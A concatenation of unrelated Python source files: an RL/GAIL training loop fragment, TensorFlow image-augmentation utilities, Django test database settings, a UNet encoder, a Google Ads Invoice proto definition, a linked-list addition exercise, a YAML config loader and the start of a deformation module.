epoch_loss.append(loss)
#print("Epoch: {}, Loss: {}".format(iteration, np.mean(epoch_loss)))
#sl = False
if render and iteration % render_freq == 0:
obs = np.expand_dims(env.reset(), axis=0)
for i in range(100):
# Render
env.render()
sleep(0.01)
# Process the actions
if use_dummy_data:
action = np.array([1.])
elif use_random:
#action = np.array([np.random.randint(2)])
action = np.array([0.])
else:
action, _ = Policy.act(obs=obs, stochastic=stochastic_policy)
action = np.array(action)
# State input to model
given_model = np.expand_dims(np.concatenate([np.squeeze(obs)]+[action]*act_dim, axis=0), axis=0)
obs, _ = Model.step(given_model, stochastic=True)
env.env.state = np.squeeze(obs)
print(given_model)
if rl:
# Reinforcement Learning
observations = []
actions = []
rewards = []
v_preds = []
run_policy_steps = 0
obs = np.expand_dims(env.reset(), axis=0)
while True:
#env.render()
run_policy_steps += 1
if use_dummy_data:
act = np.array([[1.]])
elif use_random:
#act = np.array([[np.random.randint(2)]])
act = np.array([[0.]])
else:
act, _ = Policy.act(obs=obs, stochastic=stochastic_policy)
act = np.expand_dims(act, axis=0)
# Model state
state = np.concatenate([obs] + [act]*act_dim, axis=1)
assert state.shape[1] == obs_dim + act_dim
# Take a step with the model
if disc_test:
next_obs, reward, done, info = env.step(np.asscalar(act))
next_obs = np.expand_dims(next_obs, axis=0)
v_pred = 0
else:
next_obs, v_pred = Model.step(state, stochastic=stochastic_model)
v_pred = np.asscalar(v_pred)
#done = check_done(np.squeeze(next_obs), run_policy_steps)
done = check_done_easy(run_policy_steps)
reward = 1. if not done else 0.
observations.append(state)
actions.append(next_obs)
rewards.append(reward)
v_preds.append(v_pred)
if done:
_, v_pred = Policy.act(obs=next_obs, stochastic=stochastic_policy)
v_preds_next = v_preds[1:] + [np.asscalar(v_pred)]
break
else:
obs = next_obs
# Summary
el_sum = tf.Summary(value=[tf.Summary.Value(tag='episode_length', simple_value=run_policy_steps)])
er_sum = tf.Summary(value=[tf.Summary.Value(tag='episode_reward', simple_value=sum(rewards))])
writer.add_summary(el_sum, iteration)
writer.add_summary(er_sum, iteration)
'''
# Finished check
if sum(rewards) >= 195:
success_num += 1
if success_num >= 100:
saver.save(sess, args.savedir + '/model.ckpt')
print('Clear!! Model saved.')
break
else:
success_num = 0
'''
# convert list to numpy array for feeding tf.placeholder
observations = np.reshape(observations, newshape=[-1] + [obs_dim + act_dim])
actions = np.reshape(actions, newshape=[-1] + [obs_dim])
'''
for j in range(len(observations)):
env.env.state = observations[j, :4]
env.render()
'''
# output of this discriminator is reward
d_rewards = D.get_rewards(agent_s=observations, agent_a=actions)
e_rewards = D.get_rewards(agent_s=exp_o, agent_a=exp_a)
d_rewards = np.reshape(d_rewards, newshape=[-1]).astype(dtype=np.float32)
'''
# train discriminator
if iteration % d_freq == 0 and np.mean(e_rewards) / np.mean(d_rewards) < 1.5:
for epoch in range(1):
for k in range(1):
batch_idx_exp = np.random.randint(num_demo, size=batch)
batch_idx = np.random.randint(len(observations), size=batch)
#batch_idx = np.random.randint(num_demo, size=batch)
batch_exp_o = exp_o[batch_idx_exp]
batch_exp_a = exp_a[batch_idx_exp]
batch_obs = observations[batch_idx]
batch_a = actions[batch_idx]
#batch_obs = exp_o[batch_idx]
#batch_a = exp_a[batch_idx]
D.train(expert_s=batch_exp_o,
expert_a=batch_exp_a,
agent_s=batch_obs,
agent_a=batch_a)
'''
if np.mean(e_rewards) / np.mean(d_rewards) < 2.:
for k in range(1):
D.train(expert_s=exp_o,
expert_a=exp_a,
agent_s=observations,
agent_a=actions)
# output of this discriminator is reward
d_rewards = D.get_rewards(agent_s=observations, agent_a=actions)
e_rewards = D.get_rewards(agent_s=exp_o, agent_a=exp_a)
d_rewards = np.reshape(d_rewards, newshape=[-1]).astype(dtype=np.float32)
print("Iteration: {}, Rewards: {}, DRewards: {}, ERewards: {}".format(iteration, sum(rewards), np.mean(d_rewards), np.mean(e_rewards)), end='\r')
if not disc_test:
# Advantage estimation
gaes = PPO.get_gaes(rewards=d_rewards, v_preds=v_preds, v_preds_next=v_preds_next)
gaes = np.array(gaes).astype(dtype=np.float32)
v_preds_next = np.array(v_preds_next).astype(dtype=np.float32)
# Train policy
inp = [observations, actions, gaes, d_rewards, v_preds_next]
PPO.assign_policy_parameters()
for epoch in range(5): # 3, 100 (works well): 5, 200 works well
sample_indices = np.random.randint(low=0, high=observations.shape[0], size=32) # indices are in [low, high)
                        sampled_inp = [np.take(a=a, indices=sample_indices, axis=0) for a in inp]  # sample training data
PPO.train(obs=sampled_inp[0],
actions=sampled_inp[1],
gaes=sampled_inp[2],
rewards=sampled_inp[3],
v_preds_next=sampled_inp[4])
summary = PPO.get_summary(obs=inp[0],
actions=inp[1],
gaes=inp[2],
rewards=inp[3],
v_preds_next=inp[4])
sl_loss = Model.get_sl_loss(given, tv)
writer.add_summary(summary, iteration)
writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag='d_rewards', simple_value=np.mean(d_rewards))]), iteration)
writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag='sl_loss', simple_value=sl_loss)]), iteration)
writer.close()
|
py | b4036371fe6df8141e4324d2f23b3f76eea127a6 | import tensorflow as tf
from tensorflow.contrib import slim
import cv2
import os, random
import numpy as np
import scipy.stats as st
from scipy.ndimage import filters
from skimage import segmentation, color
from joblib import Parallel, delayed
from PIL import Image
import sys, math
class ImageData:
def __init__(self, load_size, channels, augment_flag):
self.load_size = load_size
self.channels = channels
self.augment_flag = augment_flag
def image_processing(self, filename):
x = tf.read_file(filename)
x_decode = tf.image.decode_jpeg(x, channels=self.channels)
img = tf.image.resize_images(x_decode, [self.load_size, self.load_size])
img = tf.cast(img, tf.float32) / 127.5 - 1
if self.augment_flag :
augment_size = self.load_size + (30 if self.load_size == 256 else 15)
p = random.random()
if p > 0.5:
img = data_augmentation(img, augment_size)
return img
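# Hedged usage sketch of ImageData (TF1-style tf.data pipeline; the file list is illustrative):
#   loader = ImageData(load_size=256, channels=3, augment_flag=True)
#   dataset = tf.data.Dataset.from_tensor_slices(trainA_paths).map(loader.image_processing)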
def data_augmentation(image, augment_size):
seed = random.randint(0, 2 ** 31 - 1)
ori_image_shape = tf.shape(image)
image = tf.image.random_flip_left_right(image, seed=seed)
image = tf.image.resize_images(image, [augment_size, augment_size])
image = tf.random_crop(image, ori_image_shape, seed=seed)
return image
def load_test_data(image_path, size=256):
img = cv2.imread(image_path, flags=cv2.IMREAD_COLOR)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = cv2.resize(img, dsize=(size, size))
img = np.expand_dims(img, axis=0)
img = img/127.5 - 1
return img
def save_images(images, size, image_path):
return imsave(inverse_transform(images), size, image_path)
def inverse_transform(images):
return ((images+1.) / 2) * 255.0
def imsave(images, size, path):
images = merge(images, size)
images = cv2.cvtColor(images.astype('uint8'), cv2.COLOR_RGB2BGR)
return cv2.imwrite(path, images)
def merge(images, size):
h, w = images.shape[1], images.shape[2]
img = np.zeros((h * size[0], w * size[1], 3))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[h*j:h*(j+1), w*i:w*(i+1), :] = image
return img
def show_all_variables():
model_vars = tf.trainable_variables()
slim.model_analyzer.analyze_vars(model_vars, print_info=True)
def check_folder(log_dir):
if not os.path.exists(log_dir):
os.makedirs(log_dir)
return log_dir
def str2bool(x):
    return x.lower() in ('true',)
##########################################
# Image Augmentation.
##########################################
def image_augmentation(image):
_realA = random_brightness(image)
_realA = random_contrast(_realA)
_realA = random_color_transform(_realA)
_realA = additive_shade(_realA)
_realA = guided_filter(_realA, image, 5, eps=2e-1)
_realA = random_distortion(_realA)
return _realA
def additive_gaussian_noise(image, stddev_range=[5, 95]):
stddev = tf.random_uniform((), *stddev_range)
p = random.random()
noise = p * tf.random_normal(tf.shape(image), stddev=stddev)
return image + noise
def random_brightness(image, max_abs_change=50):
return tf.image.random_brightness(image, max_abs_change)
def random_contrast(image, strength_range=[0.5, 1.5]):
return tf.image.random_contrast(image, *strength_range)
def random_color_transform(image, color_matrix=None):
# color_matrix is 3x3
if color_matrix is None:
color_matrix = tf.random_uniform((3,3), 0, 1.0, dtype=tf.float32)
color_matrix_norm = tf.reduce_sum(color_matrix, axis=0, keepdims=True)
color_matrix = color_matrix / (color_matrix_norm + 1e-6)
elif isinstance(color_matrix, np.ndarray):
color_matrix = tf.convert_to_tensor(color_matrix, dtype=tf.float32)
im_shp = tf.shape(image)
C = im_shp[-1]
image = tf.reshape(image, [-1, C])
image = tf.matmul(image, color_matrix)
image = tf.reshape(image, im_shp)
return image
def additive_shade(image, nb_ellipses=20, transparency_range=[-0.5, 0.8],
kernel_size_range=[250, 350]):
def _py_additive_shade(img):
min_dim = min(img.shape[:2]) / 4
mask = np.zeros(img.shape[:2], np.uint8)
for i in range(nb_ellipses):
ax = int(max(np.random.rand() * min_dim, min_dim / 5))
ay = int(max(np.random.rand() * min_dim, min_dim / 5))
max_rad = max(ax, ay)
x = np.random.randint(max_rad, img.shape[1] - max_rad) # center
y = np.random.randint(max_rad, img.shape[0] - max_rad)
angle = np.random.rand() * 90
cv2.ellipse(mask, (x, y), (ax, ay), angle, 0, 360, 255, -1)
transparency = np.random.uniform(*transparency_range)
kernel_size = np.random.randint(*kernel_size_range)
if (kernel_size % 2) == 0: # kernel_size has to be odd
kernel_size += 1
mask = cv2.GaussianBlur(mask.astype(np.float32), (kernel_size, kernel_size), 0)
shaded = img * (1 - transparency * mask[..., np.newaxis]/255.)
return shaded
shaded = tf.py_func(_py_additive_shade, [image], tf.float32)
res = tf.reshape(shaded, tf.shape(image))
return res
def tf_box_filter(x, r):
ch = x.get_shape().as_list()[-1]
weight = 1/((2*r+1)**2)
box_kernel = weight*np.ones((2*r+1, 2*r+1, ch, 1))
box_kernel = np.array(box_kernel).astype(np.float32)
output = tf.nn.depthwise_conv2d(x, box_kernel, [1, 1, 1, 1], 'SAME')
return output
def guided_filter(x, y, r, eps=1e-2):
x_shape = tf.shape(x)
N = tf_box_filter(tf.ones((1, x_shape[1], x_shape[2], 1), dtype=x.dtype), r)
mean_x = tf_box_filter(x, r) / N
mean_y = tf_box_filter(y, r) / N
cov_xy = tf_box_filter(x * y, r) / N - mean_x * mean_y
var_x = tf_box_filter(x * x, r) / N - mean_x * mean_x
A = cov_xy / (var_x + eps)
b = mean_y - A * mean_x
mean_A = tf_box_filter(A, r) / N
mean_b = tf_box_filter(b, r) / N
output = mean_A * x + mean_b
return output
def random_distortion(images, num_anchors=10, perturb_sigma=5.0, disable_border=True):
# Similar results to elastic deformation (a bit complex transformation)
# However, the transformation is much faster that elastic deformation and have a straightforward arguments
# TODO: Need to adapt reflect padding and eliminate out-of-frame
# images is 4D tensor [B,H,W,C]
# num_anchors : the number of base position to make distortion, total anchors in a image = num_anchors**2
# perturb_sigma : the displacement sigma of each anchor
src_shp_list = images.get_shape().as_list()
batch_size, src_height, src_width = tf.unstack(tf.shape(images))[:3]
if disable_border:
pad_size = tf.to_int32(tf.to_float(tf.maximum(src_height, src_width)) * (np.sqrt(2)-1.0) / 2 + 0.5)
images = tf.pad(images, [[0,0], [pad_size]*2, [pad_size]*2, [0,0]], 'REFLECT')
height, width = tf.unstack(tf.shape(images))[1:3]
mapx_base = tf.matmul(tf.ones(shape=tf.stack([num_anchors, 1])),
tf.transpose(tf.expand_dims(tf.linspace(0., tf.to_float(width), num_anchors), 1), [1, 0]))
mapy_base = tf.matmul(tf.expand_dims(tf.linspace(0., tf.to_float(height), num_anchors), 1),
tf.ones(shape=tf.stack([1, num_anchors])))
mapx_base = tf.tile(mapx_base[None,...,None], [batch_size,1,1,1]) # [batch_size, N, N, 1]
mapy_base = tf.tile(mapy_base[None,...,None], [batch_size,1,1,1])
distortion_x = tf.random_normal((batch_size,num_anchors,num_anchors,1), stddev=perturb_sigma)
distortion_y = tf.random_normal((batch_size,num_anchors,num_anchors,1), stddev=perturb_sigma)
mapx = mapx_base + distortion_x
mapy = mapy_base + distortion_y
mapx_inv = mapx_base - distortion_x
mapy_inv = mapy_base - distortion_y
interp_mapx_base = tf.image.resize_images(mapx_base, size=(height, width), method=tf.image.ResizeMethod.BILINEAR, align_corners=True)
interp_mapy_base = tf.image.resize_images(mapy_base, size=(height, width), method=tf.image.ResizeMethod.BILINEAR, align_corners=True)
coord_maps_base = tf.concat([interp_mapx_base, interp_mapy_base], axis=-1)
interp_mapx = tf.image.resize_images(mapx, size=(height, width), method=tf.image.ResizeMethod.BILINEAR, align_corners=True)
interp_mapy = tf.image.resize_images(mapy, size=(height, width), method=tf.image.ResizeMethod.BILINEAR, align_corners=True)
coord_maps = tf.concat([interp_mapx, interp_mapy], axis=-1) # [batch_size, height, width, 2]
# interp_mapx_inv = tf.image.resize_images(mapx_inv, size=(height, width), method=tf.image.ResizeMethod.BILINEAR, align_corners=True)
# interp_mapy_inv = tf.image.resize_images(mapy_inv, size=(height, width), method=tf.image.ResizeMethod.BILINEAR, align_corners=True)
# coord_maps_inv = tf.concat([interp_mapx_inv, interp_mapy_inv], axis=-1) # [batch_size, height, width, 2]
coord_maps_inv = coord_maps_base + (coord_maps_base-coord_maps)
warp_images = bilinear_sampling(images, coord_maps)
if disable_border:
warp_images = tf.slice(warp_images, [0, pad_size, pad_size, 0], [-1, src_height, src_width, -1])
warp_images.set_shape(src_shp_list)
# shp_list[-1] = 2
# coord_maps.set_shape(shp_list)
# coord_maps_inv.set_shape(shp_list)
return warp_images
# return warp_images, coord_maps, coord_maps_inv
#
# Image processing
# Some codes come from https://github.com/rpautrat/SuperPoint
# input image is supposed to be 3D tensor [H,W,C] and floating 0~255 values
#
def get_rank(inputs):
return len(inputs.get_shape())
def bilinear_sampling(photos, coords):
"""Construct a new image by bilinear sampling from the input image.
Points falling outside the source image boundary have value 0.
Args:
photos: source image to be sampled from [batch, height_s, width_s, channels]
coords: coordinates of source pixels to sample from [batch, height_t,
width_t, 2]. height_t/width_t correspond to the dimensions of the output
image (don't need to be the same as height_s/width_s). The two channels
correspond to x and y coordinates respectively.
Returns:
A new sampled image [batch, height_t, width_t, channels]
"""
# photos: [batch_size, height2, width2, C]
# coords: [batch_size, height1, width1, C]
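    # Hedged usage sketch (identity warp; shapes are assumed, not taken from this repo):
    #   xs, ys = tf.meshgrid(tf.range(64, dtype=tf.float32), tf.range(64, dtype=tf.float32))
    #   coords = tf.stack([xs, ys], axis=-1)[None]   # [1, 64, 64, 2]
    #   warped = bilinear_sampling(photos, coords)   # ~= photos for in-range coordinates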
def _repeat(x, n_repeats):
rep = tf.transpose(
tf.expand_dims(tf.ones(shape=tf.stack([
n_repeats,
])), 1), [1, 0])
rep = tf.cast(rep, 'float32')
x = tf.matmul(tf.reshape(x, (-1, 1)), rep)
return tf.reshape(x, [-1])
with tf.name_scope('image_sampling'):
coords_x, coords_y = tf.split(coords, [1, 1], axis=3)
inp_size = tf.shape(photos)
coord_size = tf.shape(coords)
out_size = tf.stack([coord_size[0],
coord_size[1],
coord_size[2],
inp_size[3],
])
coords_x = tf.cast(coords_x, 'float32')
coords_y = tf.cast(coords_y, 'float32')
x0 = tf.floor(coords_x)
x1 = x0 + 1
y0 = tf.floor(coords_y)
y1 = y0 + 1
y_max = tf.cast(tf.shape(photos)[1] - 1, 'float32')
x_max = tf.cast(tf.shape(photos)[2] - 1, 'float32')
zero = tf.zeros([1], dtype='float32')
x0_safe = tf.clip_by_value(x0, zero, x_max)
y0_safe = tf.clip_by_value(y0, zero, y_max)
x1_safe = tf.clip_by_value(x1, zero, x_max)
y1_safe = tf.clip_by_value(y1, zero, y_max)
## bilinear interp weights, with points outside the grid having weight 0
# wt_x0 = (x1 - coords_x) * tf.cast(tf.equal(x0, x0_safe), 'float32')
# wt_x1 = (coords_x - x0) * tf.cast(tf.equal(x1, x1_safe), 'float32')
# wt_y0 = (y1 - coords_y) * tf.cast(tf.equal(y0, y0_safe), 'float32')
# wt_y1 = (coords_y - y0) * tf.cast(tf.equal(y1, y1_safe), 'float32')
wt_x0 = x1_safe - coords_x
wt_x1 = coords_x - x0_safe
wt_y0 = y1_safe - coords_y
wt_y1 = coords_y - y0_safe
## indices in the flat image to sample from
dim2 = tf.cast(inp_size[2], 'float32')
dim1 = tf.cast(inp_size[2] * inp_size[1], 'float32')
base = tf.reshape(
_repeat(
tf.cast(tf.range(coord_size[0]), 'float32') * dim1,
coord_size[1] * coord_size[2]),
[out_size[0], out_size[1], out_size[2], 1])
base_y0 = base + y0_safe * dim2
base_y1 = base + y1_safe * dim2
idx00 = tf.reshape(x0_safe + base_y0, [-1])
idx01 = x0_safe + base_y1
idx10 = x1_safe + base_y0
idx11 = x1_safe + base_y1
## sample from photos
photos_flat = tf.reshape(photos, tf.stack([-1, inp_size[3]]))
photos_flat = tf.cast(photos_flat, 'float32')
im00 = tf.reshape(tf.gather(photos_flat, tf.cast(idx00, 'int32')), out_size)
im01 = tf.reshape(tf.gather(photos_flat, tf.cast(idx01, 'int32')), out_size)
im10 = tf.reshape(tf.gather(photos_flat, tf.cast(idx10, 'int32')), out_size)
im11 = tf.reshape(tf.gather(photos_flat, tf.cast(idx11, 'int32')), out_size)
w00 = wt_x0 * wt_y0
w01 = wt_x0 * wt_y1
w10 = wt_x1 * wt_y0
w11 = wt_x1 * wt_y1
out_photos = tf.add_n([
w00 * im00, w01 * im01,
w10 * im10, w11 * im11])
return out_photos |
py | b40363dd283abae2c8ddc199b113ab4a3090ac4e | from tests.settings_base import * # noqa
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'pytest_django' + db_suffix,
'HOST': 'localhost',
'USER': 'root',
'OPTIONS': {
'init_command': 'SET storage_engine=MyISAM'
}
},
}
|
py | b40363ff9120fcaa0c0bfcb4976bb5fc0df66341 | #########################################################################################################################
## Distribution code Version 1.0 -- 14/10/2021 by Tak Ming Wong Copyright 2021, University of Siegen
##
## The Code is created based on the method described in the following paper
## [1] "Deep Optimization Prior for THz Model Parameter Estimation", T.M. Wong, H. Bauermeister, M. Kahl, P. Haring Bolivar, M. Moeller, A. Kolb,
## Winter Conference on Applications of Computer Vision (WACV) 2022.
##
## If you use this code in your scientific publication, please cite the mentioned paper.
## The code and the algorithm are for non-comercial use only.
##
## For other details, please visit website https://github.com/tak-wong/Deep-Optimization-Prior
#########################################################################################################################
import torch
import torch.nn as nn
from .unet.skip import skip
from ..hyperparameter import *
def get_network_encoder_unet(device, model, hp):
network = skip(num_input_channels = model.NQ,
num_output_channels = model.NP,
num_channels_down = hp.NET_UNET_CHANNELS_DOWN,
num_channels_up = hp.NET_UNET_CHANNELS_UP,
num_channels_skip = hp.NET_UNET_CHANNELS_SKIP,
upsample_mode = hp.NET_UNET_MODE,
need_sigmoid = hp.NET_UNET_NEED_SIGMOID,
need_bias = hp.NET_UNET_NEED_BIAS,
pad = hp.NET_UNET_PAD,
act_fun = hp.NET_UNET_ACT_FUNC).type(torch.cuda.FloatTensor)
return network
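# Hedged usage sketch: `model` is expected to expose the NQ/NP channel counts and `hp`
# the NET_UNET_* settings from ..hyperparameter (both inferred from the call above);
# note the network is cast to torch.cuda.FloatTensor, so a CUDA device is assumed:
#   net = get_network_encoder_unet(device, model, hp)
#   params = net(measurements)   # maps NQ input channels to NP parameter maps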
# network of encoder
class network(nn.Module):
# -----------------------------------------------------------------------
def __init__(self, device, hp, verbose = False):
super(network, self).__init__()
self.verbose = verbose
self.device = device
self.hp = hp
if self.verbose:
print("network_encoder is initialized")
# -----------------------------------------------------------------------
def initialize_weights(self):
pass
# -----------------------------------------------------------------------
def forward(self, x):
pass
|
py | b40365b90a951594d23eb299cff5922dc680238c | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v7.common.types import dates
from google.ads.googleads.v7.enums.types import invoice_type
__protobuf__ = proto.module(
package="google.ads.googleads.v7.resources",
marshal="google.ads.googleads.v7",
manifest={"Invoice",},
)
class Invoice(proto.Message):
r"""An invoice. All invoice information is snapshotted to match
the PDF invoice. For invoices older than the launch of
InvoiceService, the snapshotted information may not match the
PDF invoice.
Attributes:
resource_name (str):
Output only. The resource name of the invoice. Multiple
customers can share a given invoice, so multiple resource
names may point to the same invoice. Invoice resource names
have the form:
``customers/{customer_id}/invoices/{invoice_id}``
id (str):
Output only. The ID of the invoice. It
appears on the invoice PDF as "Invoice number".
type_ (google.ads.googleads.v7.enums.types.InvoiceTypeEnum.InvoiceType):
Output only. The type of invoice.
billing_setup (str):
Output only. The resource name of this invoice’s billing
setup.
``customers/{customer_id}/billingSetups/{billing_setup_id}``
payments_account_id (str):
Output only. A 16 digit ID used to identify
the payments account associated with the billing
setup, e.g. "1234-5678-9012-3456". It appears on
the invoice PDF as "Billing Account Number".
payments_profile_id (str):
Output only. A 12 digit ID used to identify
the payments profile associated with the billing
setup, e.g. "1234-5678-9012". It appears on the
invoice PDF as "Billing ID".
issue_date (str):
Output only. The issue date in yyyy-mm-dd
format. It appears on the invoice PDF as either
"Issue date" or "Invoice date".
due_date (str):
Output only. The due date in yyyy-mm-dd
format.
service_date_range (google.ads.googleads.v7.common.types.DateRange):
Output only. The service period date range of
this invoice. The end date is inclusive.
currency_code (str):
Output only. The currency code. All costs are
returned in this currency. A subset of the
currency codes derived from the ISO 4217
standard is supported.
adjustments_subtotal_amount_micros (int):
Output only. The pretax subtotal amount of
invoice level adjustments, in micros.
adjustments_tax_amount_micros (int):
Output only. The sum of taxes on the invoice
level adjustments, in micros.
adjustments_total_amount_micros (int):
Output only. The total amount of invoice
level adjustments, in micros.
regulatory_costs_subtotal_amount_micros (int):
Output only. The pretax subtotal amount of
invoice level regulatory costs, in micros.
regulatory_costs_tax_amount_micros (int):
Output only. The sum of taxes on the invoice
level regulatory costs, in micros.
regulatory_costs_total_amount_micros (int):
Output only. The total amount of invoice
level regulatory costs, in micros.
subtotal_amount_micros (int):
Output only. The pretax subtotal amount, in micros. This
equals the sum of the AccountBudgetSummary subtotal amounts,
Invoice.adjustments_subtotal_amount_micros, and
Invoice.regulatory_costs_subtotal_amount_micros. Starting
with v6, the Invoice.regulatory_costs_subtotal_amount_micros
is no longer included.
tax_amount_micros (int):
Output only. The sum of all taxes on the
invoice, in micros. This equals the sum of the
AccountBudgetSummary tax amounts, plus taxes not
associated with a specific account budget.
total_amount_micros (int):
Output only. The total amount, in micros. This equals the
sum of Invoice.subtotal_amount_micros and
Invoice.tax_amount_micros. Starting with v6,
Invoice.regulatory_costs_subtotal_amount_micros is also
added as it is no longer already included in
Invoice.tax_amount_micros.
corrected_invoice (str):
Output only. The resource name of the original invoice
corrected, wrote off, or canceled by this invoice, if
applicable. If ``corrected_invoice`` is set,
``replaced_invoices`` will not be set. Invoice resource
names have the form:
``customers/{customer_id}/invoices/{invoice_id}``
replaced_invoices (Sequence[str]):
Output only. The resource name of the original invoice(s)
being rebilled or replaced by this invoice, if applicable.
There might be multiple replaced invoices due to invoice
consolidation. The replaced invoices may not belong to the
same payments account. If ``replaced_invoices`` is set,
``corrected_invoice`` will not be set. Invoice resource
names have the form:
``customers/{customer_id}/invoices/{invoice_id}``
pdf_url (str):
Output only. The URL to a PDF copy of the
invoice. Users need to pass in their OAuth token
to request the PDF with this URL.
account_budget_summaries (Sequence[google.ads.googleads.v7.resources.types.Invoice.AccountBudgetSummary]):
Output only. The list of summarized account
budget information associated with this invoice.
"""
class AccountBudgetSummary(proto.Message):
r"""Represents a summarized account budget billable cost.
Attributes:
customer (str):
Output only. The resource name of the customer associated
with this account budget. This contains the customer ID,
which appears on the invoice PDF as "Account ID". Customer
resource names have the form:
``customers/{customer_id}``
customer_descriptive_name (str):
Output only. The descriptive name of the
account budget’s customer. It appears on the
invoice PDF as "Account".
account_budget (str):
Output only. The resource name of the account budget
associated with this summarized billable cost. AccountBudget
resource names have the form:
``customers/{customer_id}/accountBudgets/{account_budget_id}``
account_budget_name (str):
Output only. The name of the account budget.
It appears on the invoice PDF as "Account
budget".
purchase_order_number (str):
Output only. The purchase order number of the
account budget. It appears on the invoice PDF as
"Purchase order".
subtotal_amount_micros (int):
Output only. The pretax subtotal amount
attributable to this budget during the service
period, in micros.
tax_amount_micros (int):
Output only. The tax amount attributable to
this budget during the service period, in
micros.
total_amount_micros (int):
Output only. The total amount attributable to
this budget during the service period, in
micros. This equals the sum of the account
budget subtotal amount and the account budget
tax amount.
billable_activity_date_range (google.ads.googleads.v7.common.types.DateRange):
Output only. The billable activity date range
of the account budget, within the service date
range of this invoice. The end date is
inclusive. This can be different from the
account budget's start and end time.
"""
customer = proto.Field(proto.STRING, number=10, optional=True,)
customer_descriptive_name = proto.Field(
proto.STRING, number=11, optional=True,
)
account_budget = proto.Field(proto.STRING, number=12, optional=True,)
account_budget_name = proto.Field(
proto.STRING, number=13, optional=True,
)
purchase_order_number = proto.Field(
proto.STRING, number=14, optional=True,
)
subtotal_amount_micros = proto.Field(
proto.INT64, number=15, optional=True,
)
tax_amount_micros = proto.Field(proto.INT64, number=16, optional=True,)
total_amount_micros = proto.Field(
proto.INT64, number=17, optional=True,
)
billable_activity_date_range = proto.Field(
proto.MESSAGE, number=9, message=dates.DateRange,
)
resource_name = proto.Field(proto.STRING, number=1,)
id = proto.Field(proto.STRING, number=25, optional=True,)
type_ = proto.Field(
proto.ENUM, number=3, enum=invoice_type.InvoiceTypeEnum.InvoiceType,
)
billing_setup = proto.Field(proto.STRING, number=26, optional=True,)
payments_account_id = proto.Field(proto.STRING, number=27, optional=True,)
payments_profile_id = proto.Field(proto.STRING, number=28, optional=True,)
issue_date = proto.Field(proto.STRING, number=29, optional=True,)
due_date = proto.Field(proto.STRING, number=30, optional=True,)
service_date_range = proto.Field(
proto.MESSAGE, number=9, message=dates.DateRange,
)
currency_code = proto.Field(proto.STRING, number=31, optional=True,)
adjustments_subtotal_amount_micros = proto.Field(proto.INT64, number=19,)
adjustments_tax_amount_micros = proto.Field(proto.INT64, number=20,)
adjustments_total_amount_micros = proto.Field(proto.INT64, number=21,)
regulatory_costs_subtotal_amount_micros = proto.Field(
proto.INT64, number=22,
)
regulatory_costs_tax_amount_micros = proto.Field(proto.INT64, number=23,)
regulatory_costs_total_amount_micros = proto.Field(proto.INT64, number=24,)
subtotal_amount_micros = proto.Field(proto.INT64, number=33, optional=True,)
tax_amount_micros = proto.Field(proto.INT64, number=34, optional=True,)
total_amount_micros = proto.Field(proto.INT64, number=35, optional=True,)
corrected_invoice = proto.Field(proto.STRING, number=36, optional=True,)
replaced_invoices = proto.RepeatedField(proto.STRING, number=37,)
pdf_url = proto.Field(proto.STRING, number=38, optional=True,)
account_budget_summaries = proto.RepeatedField(
proto.MESSAGE, number=18, message=AccountBudgetSummary,
)
__all__ = tuple(sorted(__protobuf__.manifest))
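# Hedged usage sketch (proto-plus message; field values are illustrative only):
#   invoice = Invoice(resource_name="customers/123/invoices/456", currency_code="USD")
#   total_units = (invoice.total_amount_micros or 0) / 1e6   # micros -> currency units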
|
py | b40367205074f45cadabfc94d4adcffbc58d332d | # Exercise: Add Two Numbers
# You are given two non-empty linked lists representing two non-negative integers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list.
# You may assume the two numbers do not contain any leading zero, except the number 0 itself.
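# Worked example: 342 + 465 = 807
#   Input:  (2 -> 4 -> 3) + (5 -> 6 -> 4)
#   Output:  7 -> 0 -> 8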
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
    def addTwoNumbers(self, l1, l2):
        """
        :type l1: ListNode
        :type l2: ListNode
        :rtype: ListNode
        """
        # Read each reversed-digit list into a plain integer.
        num1, num2 = 0, 0
        cur1, cur2 = l1, l2
        position = 1
        while cur1:
            num1 += cur1.val * position
            cur1 = cur1.next
            position *= 10
        position = 1
        while cur2:
            num2 += cur2.val * position
            cur2 = cur2.next
            position *= 10
        total = num1 + num2
        # Emit the digits of the sum, least significant first, as a new linked list.
        head = ListNode(total % 10)
        node = head
        total //= 10
        while total > 0:
            node.next = ListNode(total % 10)
            node = node.next
            total //= 10
        return head
############################################
#### TO PRINT SOLUTIONS: ####
#### ####
############################################
# l1 = ListNode(2); l1.next = ListNode(4); l1.next.next = ListNode(3)   # represents 342
# l2 = ListNode(5); l2.next = ListNode(6); l2.next.next = ListNode(4)   # represents 465
# solution = Solution()
# result = solution.addTwoNumbers(l1, l2)   # 7 -> 0 -> 8, i.e. 807
|
py | b403675937dcc488ece895a0dadb4e29eb6a057e | import pathlib
import yaml
SECRET_KEY = b'8gmb092bYf0ybnvBTgtkrVDtqTiaXQxRGKcx060W2bg='
BASE_DIR = pathlib.Path(__file__).parent
STATIC_DIR = BASE_DIR/'static'
TEMPLATES_DIR = STATIC_DIR/'templates'
config_path = BASE_DIR/'config.yaml'
def get_config(path):
with open(path) as file:
config = yaml.safe_load(file)
return config
config = get_config(config_path)
|
py | b403686d83d332dcbf103328425cdcbc2795ae91 | import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import tb_utils
import tb_manifold
import tb_tda
class tb_deformation_dirichlet(nn.Module):
def __init__(self, mesh_size, param_list=None, state_list=None):
""" Uses volume loss, sparsity loss, and continuity loss (motivated by dirichlet energy) to perform deformation.
Either provide param_list or precomputed state_list.
Args:
mesh_size (int): number of k points sampled along each axis.
param_list (list, optional): list of parameters of the form [t3, t4, [band index]]
state_list (list, optional): list of precomputed states.
"""
super().__init__()
